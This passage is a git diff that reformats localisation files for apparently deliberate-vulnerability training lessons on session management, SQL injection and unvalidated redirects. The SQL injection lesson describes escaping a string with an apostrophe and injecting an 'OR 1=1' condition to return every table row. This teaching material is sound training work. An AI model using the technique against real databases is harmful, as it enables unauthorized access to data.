+++ b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties
@@ -1,24 +1,27 @@
-title.question.session_manage=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406?
-paragraph.info.1=\u5BF9\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684<a>\u8EAB\u4EFD\u8BA4\u8BC1</a>\u548C<a>\u4F1A\u8BDD\u7BA1\u7406</a>\u653B\u51FB\u53EF\u4EE5\u88AB\u6267\u884C,\u901A\u8FC7\u4F7F\u7528\u90A3\u4E9B\u5176\u4ED6\u6F0F\u6D1E\u663E\u793A\u7684\u5B89\u5168\u98CE\u9669.\u6BD4\u5982\u8BF4,\u4EFB\u4F55\u5E94\u7528\u7A0B\u5E8F\u7684\u4F1A\u8BDD\u7BA1\u7406\u53EF\u4EE5\u5728\u4E00\u4E2A<a>\u8DE8\u7AD9\u811A\u672C\u653B\u51FB</a>\u6F0F\u6D1E\u88AB\u7528\u4E8E\u7A83\u53D6\u7528\u6237\u7684\u4F1A\u8BDDToken\u88AB\u514B\u670D.\u8BE5\u4E3B\u9898\u66F4\u591A\u7684\u5173\u4E8E\u7F3A\u9677\u662F\u5B58\u5728\u4E8E\u5E94\u7528\u7A0B\u5E8F\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6A21\u5F0F.
-paragraph.info.2=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u7F3A\u9677\u901A\u5E38\u88AB\u53D1\u73B0\u5728\u529F\u80FD\u4E0A,\u5982\u6CE8\u9500,\u5BC6\u7801\u7BA1\u7406,\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u548C\u5E10\u6237\u66F4\u65B0.\u4E00\u4E2A\u653B\u51FB\u53EF\u4EE5\u901A\u8FC7\u731C\u6D4B\u4ED6\u4EEC\u7684\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u6216\u901A\u8FC7\u53C2\u6570\u6EE5\u7528,\u53EF\u80FD\u6EE5\u7528\u8FD9\u4E9B\u529F\u80FD\u53BB\u4FEE\u6539\u5176\u4ED6\u7528\u6237\u51ED\u8BC1.\u6709\u65F6\u4FAF\u8981\u627E\u51FA\u8FD9\u4E9B\u7F3A\u9677\u662F\u6BD4\u8F83\u56F0\u96BE\u7684,\u56E0\u4E3A\u6BCF\u4E00\u4E2A\u5B9E\u73B0\u90FD\u662F\u552F\u4E00\u7684.
-paragraph.info.3=\u4EE5\u4E0B\u51E0\u79CD\u60C5\u51B5\u5F88\u5BB9\u6613\u53D7\u5230\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669;
-paragraph.info.number.1=1)
-paragraph.info.number.2=2)
-paragraph.info.number.3=3)
-paragraph.info.number.4=4)
-paragraph.info.number.5=5)
-paragraph.info.1.1=\u7528\u6237\u51ED\u8BC1\u4EE5\u4E0D\u5145\u5206\u7684 <a>\u52A0\u5BC6\u6280\u672F</a>\u6C34\u5E73<a>\u50A8\u5B58</a>.
-paragraph.info.2.2=\u53EF\u4EE5\u901A\u8FC7\u5931\u6548\u7684<a>\u5E10\u6237\u7BA1\u7406</a>\u731C\u6D4B\u6216\u66F4\u6539\u7528\u6237\u51ED\u8BC1.
-paragraph.info.3.3=\u4F1A\u8BDD\u6807\u8BC6\u7B26\u88AB\u66B4\u9732\u5728URL\u4E2D.
-paragraph.info.4.4=\u8BE5\u5E94\u7528\u7A0B\u5E8F\u6CA1\u6709\u4F7F\u7528\u5145\u5206\u7684\u4F20\u8F93\u4FDD\u62A4(\u5982<a>HTTPs</a>\u6216<a>sFTP</a>)
-paragraph.info.5.5=\u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u624B\u52A8\u66F4\u6539\u4F1A\u8BDD\u53C2\u6570.
-paragraph.info.6=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6F0F\u6D1E\u5141\u8BB8\u653B\u51FB\u8005\u53EF\u80FD\u635F\u5BB3\u6574\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u6BCF\u4E2A\u5E10\u6237.\u4E00\u65E6\u653B\u51FB\u88AB\u6267\u884C,\u653B\u51FB\u8005\u5C31\u62E5\u6709\u548C\u7528\u6237\u4E00\u6837\u7684\u6743\u9650.\u51FA\u4E8E\u8FD9\u4E2A\u539F\u56E0\uFF0C\u7279\u6743\u5E10\u6237\u6210\u4E3A\u653B\u51FB\u76EE\u6807,\u5982\u7BA1\u7406\u5458.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u8BE5\u8BFE\u7A0B\u91C7\u7528\u4E86\u4E0D\u597D\u7684\u4F1A\u8BDD\u7BA1\u7406,\u8C03\u67E5\u5982\u4E0B\u529F\u80FD\u6765\u67E5\u770B\u4F60\u662F\u5426\u53EF\u4EE5\u6B3A\u9A97\u670D\u52A1\u5668,\u8BA9\u670D\u52A1\u5668\u8BA4\u4E3A\u4F60\u5DF2\u7ECF\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u5E76\u53EF\u4EE5\u83B7\u5F97\u94A5\u5319.
-hint.title=\u8BFE\u7A0B\u63D0\u793A
-lesson.hint.1=\u8BE5\u8BFE\u7A0B\u5B58\u50A8\u672A\u52A0\u5BC6\u7684\u4F1A\u8BDD\u4FE1\u606F\u5728\u4E00\u4E2A\u7528\u6237<a>Cookie</a>\u4E2D.
-complete.button=\u5B8C\u6210\u8BE5\u8BFE\u7A0B
-word.info.loading=\u8BF7\u68A2\u4FAF...
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF: 
+title.question.session_manage = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406?
+
+paragraph.info.1 = \u5BF9\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684<a>\u8EAB\u4EFD\u8BA4\u8BC1</a>\u548C<a>\u4F1A\u8BDD\u7BA1\u7406</a>\u653B\u51FB\u53EF\u4EE5\u88AB\u6267\u884C,\u901A\u8FC7\u4F7F\u7528\u90A3\u4E9B\u5176\u4ED6\u6F0F\u6D1E\u663E\u793A\u7684\u5B89\u5168\u98CE\u9669.\u6BD4\u5982\u8BF4,\u4EFB\u4F55\u5E94\u7528\u7A0B\u5E8F\u7684\u4F1A\u8BDD\u7BA1\u7406\u53EF\u4EE5\u5728\u4E00\u4E2A<a>\u8DE8\u7AD9\u811A\u672C\u653B\u51FB</a>\u6F0F\u6D1E\u88AB\u7528\u4E8E\u7A83\u53D6\u7528\u6237\u7684\u4F1A\u8BDDToken\u88AB\u514B\u670D.\u8BE5\u4E3B\u9898\u66F4\u591A\u7684\u5173\u4E8E\u7F3A\u9677\u662F\u5B58\u5728\u4E8E\u5E94\u7528\u7A0B\u5E8F\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6A21\u5F0F.
+paragraph.info.2 = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u7F3A\u9677\u901A\u5E38\u88AB\u53D1\u73B0\u5728\u529F\u80FD\u4E0A,\u5982\u6CE8\u9500,\u5BC6\u7801\u7BA1\u7406,\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u548C\u5E10\u6237\u66F4\u65B0.\u4E00\u4E2A\u653B\u51FB\u53EF\u4EE5\u901A\u8FC7\u731C\u6D4B\u4ED6\u4EEC\u7684\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u6216\u901A\u8FC7\u53C2\u6570\u6EE5\u7528,\u53EF\u80FD\u6EE5\u7528\u8FD9\u4E9B\u529F\u80FD\u53BB\u4FEE\u6539\u5176\u4ED6\u7528\u6237\u51ED\u8BC1.\u6709\u65F6\u4FAF\u8981\u627E\u51FA\u8FD9\u4E9B\u7F3A\u9677\u662F\u6BD4\u8F83\u56F0\u96BE\u7684,\u56E0\u4E3A\u6BCF\u4E00\u4E2A\u5B9E\u73B0\u90FD\u662F\u552F\u4E00\u7684.
+paragraph.info.3 = \u4EE5\u4E0B\u51E0\u79CD\u60C5\u51B5\u5F88\u5BB9\u6613\u53D7\u5230\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669;
+paragraph.info.number.1 = 1)
+paragraph.info.number.2 = 2)
+paragraph.info.number.3 = 3)
+paragraph.info.number.4 = 4)
+paragraph.info.number.5 = 5)
+paragraph.info.1.1 = \u7528\u6237\u51ED\u8BC1\u4EE5\u4E0D\u5145\u5206\u7684 <a>\u52A0\u5BC6\u6280\u672F</a>\u6C34\u5E73<a>\u50A8\u5B58</a>.
+paragraph.info.2.2 = \u53EF\u4EE5\u901A\u8FC7\u5931\u6548\u7684<a>\u5E10\u6237\u7BA1\u7406</a>\u731C\u6D4B\u6216\u66F4\u6539\u7528\u6237\u51ED\u8BC1.
+paragraph.info.3.3 = \u4F1A\u8BDD\u6807\u8BC6\u7B26\u88AB\u66B4\u9732\u5728URL\u4E2D.
+paragraph.info.4.4 = \u8BE5\u5E94\u7528\u7A0B\u5E8F\u6CA1\u6709\u4F7F\u7528\u5145\u5206\u7684\u4F20\u8F93\u4FDD\u62A4(\u5982<a>HTTPs</a>\u6216<a>sFTP</a>)
+paragraph.info.5.5 = \u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u624B\u52A8\u66F4\u6539\u4F1A\u8BDD\u53C2\u6570.
+paragraph.info.6 = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6F0F\u6D1E\u5141\u8BB8\u653B\u51FB\u8005\u53EF\u80FD\u635F\u5BB3\u6574\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u6BCF\u4E2A\u5E10\u6237.\u4E00\u65E6\u653B\u51FB\u88AB\u6267\u884C,\u653B\u51FB\u8005\u5C31\u62E5\u6709\u548C\u7528\u6237\u4E00\u6837\u7684\u6743\u9650.\u51FA\u4E8E\u8FD9\u4E2A\u539F\u56E0\uFF0C\u7279\u6743\u5E10\u6237\u6210\u4E3A\u653B\u51FB\u76EE\u6807,\u5982\u7BA1\u7406\u5458.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u8BE5\u8BFE\u7A0B\u91C7\u7528\u4E86\u4E0D\u597D\u7684\u4F1A\u8BDD\u7BA1\u7406,\u8C03\u67E5\u5982\u4E0B\u529F\u80FD\u6765\u67E5\u770B\u4F60\u662F\u5426\u53EF\u4EE5\u6B3A\u9A97\u670D\u52A1\u5668,\u8BA9\u670D\u52A1\u5668\u8BA4\u4E3A\u4F60\u5DF2\u7ECF\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u5E76\u53EF\u4EE5\u83B7\u5F97\u94A5\u5319.
+hint.title = \u8BFE\u7A0B\u63D0\u793A
+lesson.hint.1 = \u8BE5\u8BFE\u7A0B\u5B58\u50A8\u672A\u52A0\u5BC6\u7684\u4F1A\u8BDD\u4FE1\u606F\u5728\u4E00\u4E2A\u7528\u6237<a>Cookie</a>\u4E2D.
+complete.button = \u5B8C\u6210\u8BE5\u8BFE\u7A0B
+word.info.loading = \u8BF7\u68A2\u4FAF...
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF: 
diff --git a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties
index 7613f8d42..fdee4223a 100644
--- a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties
+++ b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties
@@ -1,15 +1,21 @@
-title.question.sql_injection=SQL Injection Lesson
-paragraph.info.1=Injection flaws, such as <a>SQL injection</a>, occur when hostile data is sent to an interpreter as part of a command or query. The hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. Injections attacks are of a high severity. Injection flaws can be exploited to remove a system's confidentiality by accessing any information held on the system. These security risks can then be extended to execute updates to existing data affecting the systems integrity and availability. These attacks are easily exploitable as they can be initiated by anyone who can interact with the system through any data they pass to the application.
-paragraph.info.2=The following form's parameters are concatenated to a string that will be passed to a SQL server. This means that the data can be interpreted as part of the code. 
-paragraph.info.3=The objective here is to modify the result of the query with <a>SQL Injection</a> so that all of the table's rows are returned. This means you want to change the <a>boolean</a> result of the query's <a>WHERE</a> clause to return true for every row in the table. The easiest way to ensure the <a>boolean</a> result is always true is to inject a <a>boolean 'OR'</a> operator followed by a true statement like <a>1 = 1</a>.
-paragraph.info.4=If the parameter is been interpreted as a string, you can escape the string with an apostrophe. That means that everything after the apostrophe will be interpreted as SQL code.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Exploit the <a>SQL Injection</a> flaw in the following example to retrieve all of the rows in the table. The lesson's solution key will be found in one of these rows! The results will be posted beneath the search form.
-hint.title=Lesson Hint
-lesson.hint.1=This is the query that you are adding data to. See if you can input something that will cause the <a>WHERE</a> clause to return <a>true</a> for every row in the table. Remember, you can escape a string using an apostrophe.
-enter.user.name=Please enter the <a>user name</a> of the user that you want to look up
-get.user.button=Get this user
-word.info.loading=Loading...
-sign.hint=Would you link a hint?
-generic.error=An Error Occurred: 
\ No newline at end of file
+title.question.sql_injection = SQL Injection Lesson
+
+paragraph.info.1 = Injection flaws, such as <a>SQL injection</a>, occur when hostile data is sent to an interpreter as part of a command or query. The hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. Injections attacks are of a high severity. Injection flaws can be exploited to remove a system's confidentiality by accessing any information held on the system. These security risks can then be extended to execute updates to existing data affecting the systems integrity and availability. These attacks are easily exploitable as they can be initiated by anyone who can interact with the system through any data they pass to the application.
+paragraph.info.2 = The following form's parameters are concatenated to a string that will be passed to a SQL server. This means that the data can be interpreted as part of the code. 
+paragraph.info.3 = The objective here is to modify the result of the query with <a>SQL Injection</a> so that all of the table's rows are returned. This means you want to change the <a>boolean</a> result of the query's <a>WHERE</a> clause to return true for every row in the table. The easiest way to ensure the <a>boolean</a> result is always true is to inject a <a>boolean 'OR'</a> operator followed by a true statement like <a>1 = 1</a>.
+paragraph.info.4 = If the parameter is been interpreted as a string, you can escape the string with an apostrophe. That means that everything after the apostrophe will be interpreted as SQL code.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Exploit the <a>SQL Injection</a> flaw in the following example to retrieve all of the rows in the table. The lesson's solution key will be found in one of these rows! The results will be posted beneath the search form.
+
+hint.title = Lesson Hint
+lesson.hint.1 = This is the query that you are adding data to. See if you can input something that will cause the <a>WHERE</a> clause to return <a>true</a> for every row in the table. Remember, you can escape a string using an apostrophe.
+enter.user.name = Please enter the <a>user name</a> of the user that you want to look up
+get.user.button = Get this user
+
+
+word.info.loading = Loading...
+sign.hint = Would you link a hint?
+generic.error = An Error Occurred: 
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties
index a9b7dbf8b..ec9f3d482 100644
--- a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties
+++ b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties
@@ -1,15 +1,21 @@
-title.question.sql_injection=SQL \u6CE8\u5165
-paragraph.info.1=\u6CE8\u5165\u7F3A\u9677,\u5982<a> SQL\u6CE8\u5165</a>,\u53D1\u751F\u5728\u5F53\u6076\u610F\u7684\u6570\u636E\u88AB\u4F5C\u4E3A\u547D\u4EE4\u6216\u67E5\u8BE2\u7684\u4E00\u90E8\u5206\u53D1\u9001\u65F6. \u8BE5\u6076\u610F\u7684\u6570\u636E\u53EF\u4EE5\u6B3A\u9A97\u7FFB\u8BD1\u5668\u4EE5\u6267\u884C\u610F\u5916\u547D\u4EE4\u6216\u8BBF\u95EE\u672A\u7ECF\u6388\u6743\u7684\u6570\u636E.\u6CE8\u5165\u653B\u51FB\u7684\u4E25\u91CD\u6027\u975E\u5E38\u9AD8.\u6CE8\u5165\u7F3A\u9677\u53EF\u4EE5\u88AB\u5229\u7528\u901A\u8FC7\u8BBF\u95EE\u7CFB\u7EDF\u4E0A\u7684\u4EFB\u4F55\u4FE1\u606F\u6765\u6D88\u9664\u7CFB\u7EDF\u7684\u4FDD\u5BC6\u6027.\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669\u53EF\u4EE5\u88AB\u6269\u5C55\u5230\u6267\u884C\u66F4\u65B0\u5230\u73B0\u6709\u7684\u6570\u636E\uFF0C\u5F71\u54CD\u7CFB\u7EDF\u7684\u5B8C\u6574\u6027\u548C\u53EF\u7528\u6027.\u8FD9\u4E9B\u653B\u51FB\u662F\u5F88\u5BB9\u6613\u88AB\u5229\u7528\u7684,\u56E0\u4E3A\u5B83\u4EEC\u53EF\u4EE5\u88AB\u8D77\u7528,\u5F53\u4EFB\u4F55\u4EBA\u53EF\u4EE5\u901A\u8FC7\u4ED6\u4EEC\u4ECE\u5E94\u7528\u7A0B\u5E8F\u4F20\u8F93\u7684\u4EFB\u4F55\u6570\u636E\u4E0E\u7CFB\u7EDF\u4EA4\u4E92.
-paragraph.info.2=\u4E0B\u9762\u7684\u8868\u683C\u7684\u53C2\u6570\u4F1A\u88AB\u4E32\u8054\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32,\u5C06\u88AB\u4F20\u9001\u5230\u4E00\u4E2ASQL\u670D\u52A1\u5668.\u8FD9\u610F\u5473\u7740\u8BE5\u6570\u636E\u53EF\u4EE5\u88AB\u4F5C\u4E3A\u4EE3\u7801\u7684\u4E00\u90E8\u5206\u5904\u7406.
-paragraph.info.3=\u8FD9\u91CC\u7684\u76EE\u6807\u662F\u7528<A>SQL\u6CE8\u5165</A>\u4FEE\u6539\u67E5\u8BE2\u7684\u7ED3\u679C,\u4F7F\u5F97\u8868\u4E2D\u6240\u6709\u7684\u884C\u90FD\u8FD4\u56DE.\u8FD9\u610F\u5473\u7740\u4F60\u60F3\u6539\u53D8\u67E5\u8BE2\u7684<a>WHERE</a>\u5B50\u53E5\u8FD4\u56DE\u7684\u5E03\u5C14\u503C\u7684\u7ED3\u679C,\u4F7F\u5176\u4E3A\u771F\u503C\u53EF\u4EE5\u8FD4\u56DE\u8868\u4E2D\u7684\u6BCF\u4E00\u5217.\u6700\u7B80\u5355\u7684\u786E\u4FDD<a>\u5E03\u5C14\u503C</a>\u4E00\u76F4\u4E3A\u771F\u7684\u65B9\u5F0F\u662F\u6CE8\u5165\u4E00\u4E2A<a>\u5E03\u5C14\u503C 'OR'</a>\u64CD\u4F5C\u7B26\u968F\u540E\u662F\u50CF<A>1=1</A>\u7684\u4E00\u4E2A\u771F\u7684\u9648\u8FF0.
-paragraph.info.4=\u5982\u679C\u8BE5\u53C2\u6570\u88AB\u89E3\u91CA\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32\uFF0C\u4F60\u4FBF\u53EF\u4EE5\u4F7F\u7528\u5355\u5F15\u53F7\u9003\u8131\u5B57\u7B26\u4E32. \u8FD9\u610F\u5473\u7740\u6240\u4EE5\u4EE5\u6487\u53F7\u7ED3\u5C3E\u7684\u90FD\u5C06\u88AB\u89E3\u91CA\u4E3ASQL\u4EE3\u7801.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5229\u7528<A> SQL\u6CE8\u5165</A>\u6F0F\u6D1E\u5728\u4E0B\u9762\u7684\u4F8B\u5B50\u4E2D\u68C0\u7D22\u8868\u4E2D\u6240\u6709\u7684\u884C.\u8BE5\u8BFE\u7A0B\u7684\u5173\u952E\u94A5\u5319\u53EF\u4EE5\u5728\u5176\u4E2D\u7684\u67D0\u4E00\u884C\u627E\u5230!\u5176\u7ED3\u679C\u5C06\u4F1A\u516C\u5E03\u5728\u641C\u7D22\u8868\u4E0B\u65B9.
-hint.title=\u8BFE\u7A0B\u63D0\u793A
-lesson.hint.1=\u4F60\u9700\u8981\u6DFB\u52A0\u6570\u636E\u5230\u8BE5\u67E5\u8BE2\u8BED\u53E5.\u770B\u770B\u4F60\u7684\u8F93\u5165\u662F\u4E0D\u662F\u4F1A\u5BFC\u81F4<A> WHERE</A>\u5B50\u53E5\u8FD4\u56DE\u4E00\u4E2A<A>\u771F\u503C</A>\u5BF9\u8868\u4E2D\u7684\u6BCF\u4E00\u884C.\u8BF7\u8BB0\u4F4F\uFF0C\u4F60\u53EF\u4EE5\u4F7F\u7528\u4E00\u4E2A\u5355\u5F15\u53F7\u9003\u8131\u7684\u5B57\u7B26\u4E32.
-Tenter.user.name=\u8BF7\u8F93\u5165\u4F60\u60F3\u67E5\u770B\u7684\u7528\u6237\u7684<a>\u7528\u6237\u540D</a>
-get.user.button=\u83B7\u53D6\u8BE5\u7528\u6237
-word.info.loading=\u52A0\u8F7D\u4E2D...
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF: 
\ No newline at end of file
+title.question.sql_injection = SQL \u6CE8\u5165
+
+paragraph.info.1 = \u6CE8\u5165\u7F3A\u9677,\u5982<a> SQL\u6CE8\u5165</a>,\u53D1\u751F\u5728\u5F53\u6076\u610F\u7684\u6570\u636E\u88AB\u4F5C\u4E3A\u547D\u4EE4\u6216\u67E5\u8BE2\u7684\u4E00\u90E8\u5206\u53D1\u9001\u65F6. \u8BE5\u6076\u610F\u7684\u6570\u636E\u53EF\u4EE5\u6B3A\u9A97\u7FFB\u8BD1\u5668\u4EE5\u6267\u884C\u610F\u5916\u547D\u4EE4\u6216\u8BBF\u95EE\u672A\u7ECF\u6388\u6743\u7684\u6570\u636E.\u6CE8\u5165\u653B\u51FB\u7684\u4E25\u91CD\u6027\u975E\u5E38\u9AD8.\u6CE8\u5165\u7F3A\u9677\u53EF\u4EE5\u88AB\u5229\u7528\u901A\u8FC7\u8BBF\u95EE\u7CFB\u7EDF\u4E0A\u7684\u4EFB\u4F55\u4FE1\u606F\u6765\u6D88\u9664\u7CFB\u7EDF\u7684\u4FDD\u5BC6\u6027.\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669\u53EF\u4EE5\u88AB\u6269\u5C55\u5230\u6267\u884C\u66F4\u65B0\u5230\u73B0\u6709\u7684\u6570\u636E\uFF0C\u5F71\u54CD\u7CFB\u7EDF\u7684\u5B8C\u6574\u6027\u548C\u53EF\u7528\u6027.\u8FD9\u4E9B\u653B\u51FB\u662F\u5F88\u5BB9\u6613\u88AB\u5229\u7528\u7684,\u56E0\u4E3A\u5B83\u4EEC\u53EF\u4EE5\u88AB\u8D77\u7528,\u5F53\u4EFB\u4F55\u4EBA\u53EF\u4EE5\u901A\u8FC7\u4ED6\u4EEC\u4ECE\u5E94\u7528\u7A0B\u5E8F\u4F20\u8F93\u7684\u4EFB\u4F55\u6570\u636E\u4E0E\u7CFB\u7EDF\u4EA4\u4E92.
+paragraph.info.2 = \u4E0B\u9762\u7684\u8868\u683C\u7684\u53C2\u6570\u4F1A\u88AB\u4E32\u8054\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32,\u5C06\u88AB\u4F20\u9001\u5230\u4E00\u4E2ASQL\u670D\u52A1\u5668.\u8FD9\u610F\u5473\u7740\u8BE5\u6570\u636E\u53EF\u4EE5\u88AB\u4F5C\u4E3A\u4EE3\u7801\u7684\u4E00\u90E8\u5206\u5904\u7406.
+paragraph.info.3 = \u8FD9\u91CC\u7684\u76EE\u6807\u662F\u7528<A>SQL\u6CE8\u5165</A>\u4FEE\u6539\u67E5\u8BE2\u7684\u7ED3\u679C,\u4F7F\u5F97\u8868\u4E2D\u6240\u6709\u7684\u884C\u90FD\u8FD4\u56DE.\u8FD9\u610F\u5473\u7740\u4F60\u60F3\u6539\u53D8\u67E5\u8BE2\u7684<a>WHERE</a>\u5B50\u53E5\u8FD4\u56DE\u7684\u5E03\u5C14\u503C\u7684\u7ED3\u679C,\u4F7F\u5176\u4E3A\u771F\u503C\u53EF\u4EE5\u8FD4\u56DE\u8868\u4E2D\u7684\u6BCF\u4E00\u5217.\u6700\u7B80\u5355\u7684\u786E\u4FDD<a>\u5E03\u5C14\u503C</a>\u4E00\u76F4\u4E3A\u771F\u7684\u65B9\u5F0F\u662F\u6CE8\u5165\u4E00\u4E2A<a>\u5E03\u5C14\u503C 'OR'</a>\u64CD\u4F5C\u7B26\u968F\u540E\u662F\u50CF<A>1=1</A>\u7684\u4E00\u4E2A\u771F\u7684\u9648\u8FF0.
+paragraph.info.4 = \u5982\u679C\u8BE5\u53C2\u6570\u88AB\u89E3\u91CA\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32\uFF0C\u4F60\u4FBF\u53EF\u4EE5\u4F7F\u7528\u5355\u5F15\u53F7\u9003\u8131\u5B57\u7B26\u4E32. \u8FD9\u610F\u5473\u7740\u6240\u4EE5\u4EE5\u6487\u53F7\u7ED3\u5C3E\u7684\u90FD\u5C06\u88AB\u89E3\u91CA\u4E3ASQL\u4EE3\u7801.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5229\u7528<A> SQL\u6CE8\u5165</A>\u6F0F\u6D1E\u5728\u4E0B\u9762\u7684\u4F8B\u5B50\u4E2D\u68C0\u7D22\u8868\u4E2D\u6240\u6709\u7684\u884C.\u8BE5\u8BFE\u7A0B\u7684\u5173\u952E\u94A5\u5319\u53EF\u4EE5\u5728\u5176\u4E2D\u7684\u67D0\u4E00\u884C\u627E\u5230!\u5176\u7ED3\u679C\u5C06\u4F1A\u516C\u5E03\u5728\u641C\u7D22\u8868\u4E0B\u65B9.
+
+hint.title = \u8BFE\u7A0B\u63D0\u793A
+lesson.hint.1 = \u4F60\u9700\u8981\u6DFB\u52A0\u6570\u636E\u5230\u8BE5\u67E5\u8BE2\u8BED\u53E5.\u770B\u770B\u4F60\u7684\u8F93\u5165\u662F\u4E0D\u662F\u4F1A\u5BFC\u81F4<A> WHERE</A>\u5B50\u53E5\u8FD4\u56DE\u4E00\u4E2A<A>\u771F\u503C</A>\u5BF9\u8868\u4E2D\u7684\u6BCF\u4E00\u884C.\u8BF7\u8BB0\u4F4F\uFF0C\u4F60\u53EF\u4EE5\u4F7F\u7528\u4E00\u4E2A\u5355\u5F15\u53F7\u9003\u8131\u7684\u5B57\u7B26\u4E32.
+Tenter.user.name = \u8BF7\u8F93\u5165\u4F60\u60F3\u67E5\u770B\u7684\u7528\u6237\u7684<a>\u7528\u6237\u540D</a>
+get.user.button = \u83B7\u53D6\u8BE5\u7528\u6237
+
+
+word.info.loading = \u52A0\u8F7D\u4E2D...
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF: 
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties
index 61a068106..0769a962c 100644
--- a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties
+++ b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties
@@ -1,15 +1,20 @@
-title.question.unvalidated_redirects_forwards=What are Unvalidated Redirects and Forwards?
-paragraph.info.1=Unvalidated redirects and forwards occur in applications that <a>redirect</a> or <a>forward</a> their users to a <a>target</a> that is specified by an unvalidated parameter. An unvalidated parameter that is used to redirect a user to a normally safe location can be used by an attacker to trick victims into visiting phishing pages or even have malware installed on their machines. 
-paragraph.info.2=This attack takes advantage of a user's trust in an application. A victim is more likely to click on a link from a site that they trust than one they have never seen before.
-paragraph.info.3=These attacks can also be used to bypass access control schemes. This is done when a page that a user would not normally have access to,such as <a>administrator</a> pages, is included in a unvalidated redirect.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
